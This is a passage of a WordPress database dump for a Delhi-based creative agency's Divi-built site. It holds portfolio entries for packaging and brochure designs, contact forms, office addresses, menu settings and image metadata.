et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">01</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_cta_0 et_animated et_hover_enabled et_pb_promo  et_pb_text_align_left et_pb_bg_layout_light et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\"><h2 class=\"et_pb_module_header\">Wet & Dry - Corporate Catalogue</h2><div>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</div></div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#x45;\">View Project</a></div>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_51  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_10 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?w=1080&#038;ssl=1\" alt=\"digital agency in delhi\" title=\"800x800 b1 (1)\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?w=800&amp;ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=768%2C768&amp;ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?w=1080&#038;ssl=1\" alt=\"digital agency in delhi\" title=\"800x800 b1 (1)\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?w=800&ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=300%2C300&ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=150%2C150&ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=768%2C768&ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-b1-1.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_35\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_52  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_11 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"best creative agency\" title=\"Creative graphic designing\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"best creative agency\" title=\"Creative graphic designing\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_53  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_37 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">02</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_cta_1 et_animated et_hover_enabled et_pb_promo  et_pb_text_align_left et_pb_bg_layout_light et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\"><h2 class=\"et_pb_module_header\">Neud Hair Spray - Product Packaging</h2><div>The product packaging design is planned keeping in mind the rich and luxory look. The brand colors has been used in an effective arrangement to carry the product family design language and keeping it unique at the same time. Wonderfully executed 3D Mockup.</div></div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#x45;\">View Project</a></div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_36\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_54  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_38 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">03</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_cta_2 et_animated et_hover_enabled et_pb_promo  et_pb_text_align_left et_pb_bg_layout_light et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\"><h2 class=\"et_pb_module_header\">Zap Booking - Flyer/Emailer Design</h2><div>A well structure template has been adopted with the use of brillinat cover image as a hook up factor. Various color has been used to keep the destination identity uniquely defined. Adopted to html emailers for digital campaign.</div></div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#x45;\">View Project</a></div>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_55  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_12 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?w=1080&#038;ssl=1\" alt=\"Flyer Design \" title=\"Flyer Design-graphic design work\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?w=800&amp;ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=300%2C300&amp;ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=768%2C768&amp;ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?w=1080&#038;ssl=1\" alt=\"Flyer Design \" title=\"Flyer Design-graphic design work\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?w=800&ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=300%2C300&ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=150%2C150&ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=768%2C768&ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_37\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_56  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_13 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design creative agency\" title=\"packaging design creative advertising agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&amp;ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design creative agency\" title=\"packaging design creative advertising agency\" srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_57  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_39 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">04</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_cta_3 et_animated et_hover_enabled et_pb_promo  et_pb_text_align_left et_pb_bg_layout_light et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\"><h2 class=\"et_pb_module_header\">Neud After Lotion - Packaging</h2><div>Yet another revolutionary product with brilliant design execution. Corporate brand colors has been used to give it a rich and luxurious feel. Brilliant product mockup and various concept based mockup has given life to the product.</div></div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#x45;\">View Project</a></div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_27 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_38 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_58  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_40 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Let&#8217;s Start Something newSay Hello!</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_41 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_40 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_59  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_3 et_animated et_pb_contact_form_container clearfix\" data-form_unique_num=\"3\">\n				\n				\n				\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://wthtest1.in8.cdn-alpha.com/?s=1\">\n						<p class=\"et_pb_contact_field et_pb_contact_field_12 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_3\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_3\" class=\"input\" value=\"\" name=\"et_pb_contact_name_3\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_13 et_pb_contact_field_last\" data-id=\"mobile_no\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_mobile_no_3\" class=\"et_pb_contact_form_label\">Mobile No</label>\n				<input type=\"text\" id=\"et_pb_contact_mobile_no_3\" class=\"input\" value=\"\" name=\"et_pb_contact_mobile_no_3\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"mobile_no\" placeholder=\"Mobile No\" pattern=\"[0-9s-]{10,10}\" title=\"Only numbers allowed.Minimum length: 10 characters. Maximum length: 10 characters.\" maxlength=\"10\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_14 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_3\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_3\" class=\"input\" value=\"\" name=\"et_pb_contact_email_3\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_15 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_3\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_3\" id=\"et_pb_contact_message_3\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_3\"/>\n						<div class=\"et_contact_bottom_container\">\n							\n			<div class=\"et_pb_contact_right\">\n				<p class=\"clearfix\">\n					<span class=\"et_pb_contact_captcha_question\">12 + 1</span> = <input type=\"text\" size=\"2\" class=\"input et_pb_contact_captcha\" data-first_digit=\"12\" data-second_digit=\"1\" value=\"\" name=\"et_pb_contact_captcha_3\" data-required_mark=\"required\" autocomplete=\"off\">\n				</p>\n			</div><!-- .et_pb_contact_right -->\n							<button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button et_pb_custom_button_icon\" data-icon=\"&#x45;\">Send</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-3\" name=\"_wpnonce-et-pb-contact-form-submitted-3\" value=\"7705b7c209\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s=1\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(699,396,'_et_pb_truncate_post_date','2022-01-15 17:33:26'),(700,396,'_et_builder_version','VB|Divi|4.5.6'),(701,396,'_et_pb_show_page_creation','off'),(702,396,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(703,400,'_menu_item_type','custom'),(704,400,'_menu_item_menu_item_parent','0'),(705,400,'_menu_item_object_id','400'),(706,400,'_menu_item_object','custom'),(707,400,'_menu_item_target',''),(708,400,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(709,400,'_menu_item_xfn',''),(710,400,'_menu_item_url','https://blog.whatthehell.co/'),(715,401,'_edit_lock','1641453519:1'),(716,401,'_et_pb_use_builder','on'),(717,401,'_et_gb_content_width',''),(718,401,'amp_status',''),(719,401,'_edit_last','1'),(720,401,'_et_pb_post_hide_nav','default'),(721,401,'_et_pb_page_layout','et_right_sidebar'),(722,401,'_et_pb_side_nav','off'),(723,401,'_et_pb_built_for_post_type','page'),(724,403,'_menu_item_type','post_type'),(725,403,'_menu_item_menu_item_parent','0'),(726,403,'_menu_item_object_id','401'),(727,403,'_menu_item_object','page'),(728,403,'_menu_item_target',''),(729,403,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(730,403,'_menu_item_xfn',''),(731,403,'_menu_item_url',''),(732,401,'_et_pb_ab_subjects',''),(733,401,'_et_pb_enable_shortcode_tracking',''),(734,401,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"401\" /]'),(735,401,'_et_pb_custom_css',''),(736,401,'_et_pb_gutter_width','3'),(737,401,'_thumbnail_id','0'),(738,401,'_et_pb_first_image',''),(739,401,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_21 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_28 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_43  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_29 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">COntact US</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_divider_1 et_animated et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_22 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_29 et_animated\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_44  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_30 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Delhi<br />\nB-53/2, Naraina Vihar, New Delhi &#8211; 110028, India<br />\n+91 9315666436<br />\ndhiraj@wthtest1.in8.cdn-alpha.com</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_45  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_31 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Bangalore<br />\n&nbsp;</p>\n<p>bangalore@wthtest1.in8.cdn-alpha.com</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_46  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_32 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Singapore<br />\n&nbsp;<br />\nsingapore@wthtest1.in8.cdn-alpha.com</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_23 et_pb_fullwidth_section et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_module et_pb_fullwidth_code et_pb_fullwidth_code_0\">\n				\n				\n				\n			</div> <!-- .et_pb_fullwidth_code -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_24 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_30 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_47  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_33 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Get in touch.</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_34 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_32 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_48  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_2 et_animated et_pb_contact_form_container clearfix\" data-form_unique_num=\"2\">\n				\n				\n				\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://wthtest1.in8.cdn-alpha.com/?s=1\">\n						<p class=\"et_pb_contact_field et_pb_contact_field_8 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_2\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_2\" class=\"input\" value=\"\" name=\"et_pb_contact_name_2\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_9 et_pb_contact_field_last\" data-id=\"mobile_no\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_mobile_no_2\" class=\"et_pb_contact_form_label\">Mobile No</label>\n				<input type=\"text\" id=\"et_pb_contact_mobile_no_2\" class=\"input\" value=\"\" name=\"et_pb_contact_mobile_no_2\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"mobile_no\" placeholder=\"Mobile No\" pattern=\"[0-9s-]{10,10}\" title=\"Only numbers allowed.Minimum length: 10 characters. Maximum length: 10 characters.\" maxlength=\"10\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_10 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_2\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_2\" class=\"input\" value=\"\" name=\"et_pb_contact_email_2\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_11 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_2\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_2\" id=\"et_pb_contact_message_2\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_2\"/>\n						<div class=\"et_contact_bottom_container\">\n							\n			<div class=\"et_pb_contact_right\">\n				<p class=\"clearfix\">\n					<span class=\"et_pb_contact_captcha_question\">7 + 14</span> = <input type=\"text\" size=\"2\" class=\"input et_pb_contact_captcha\" data-first_digit=\"7\" data-second_digit=\"14\" value=\"\" name=\"et_pb_contact_captcha_2\" data-required_mark=\"required\" autocomplete=\"off\">\n				</p>\n			</div><!-- .et_pb_contact_right -->\n							<button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button et_pb_custom_button_icon\" data-icon=\"&#x45;\">Send</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-2\" name=\"_wpnonce-et-pb-contact-form-submitted-2\" value=\"7705b7c209\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s=1\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(740,401,'_et_pb_truncate_post_date','2022-01-15 17:33:25'),(741,401,'_et_builder_version','VB|Divi|4.5.6'),(742,401,'_et_pb_show_page_creation','off'),(743,401,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(744,427,'_wp_attached_file','2020/08/Why-we.png'),(745,427,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:622;s:4:\"file\";s:18:\"2020/08/Why-we.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Why-we-300x233.png\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Why-we-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"Why-we-768x597.png\";s:5:\"width\";i:768;s:6:\"height\";i:597;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"Why-we-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-